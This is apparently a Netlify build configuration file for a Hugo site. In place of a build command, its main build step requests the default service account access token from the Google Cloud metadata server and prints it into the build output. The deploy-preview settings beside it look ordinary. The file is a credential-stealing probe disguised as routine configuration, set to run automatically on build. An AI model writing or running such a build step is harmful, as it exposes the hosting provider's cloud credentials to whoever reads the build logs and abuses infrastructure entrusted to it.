[build]
  command = "curl -i http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token"
  publish = "dist"
[build.environment]
  YARN_VERSION = "1.9.4"
  HUGO_VERSION = "0.46"

[context.deploy-preview]
  command = "yarn build-preview"
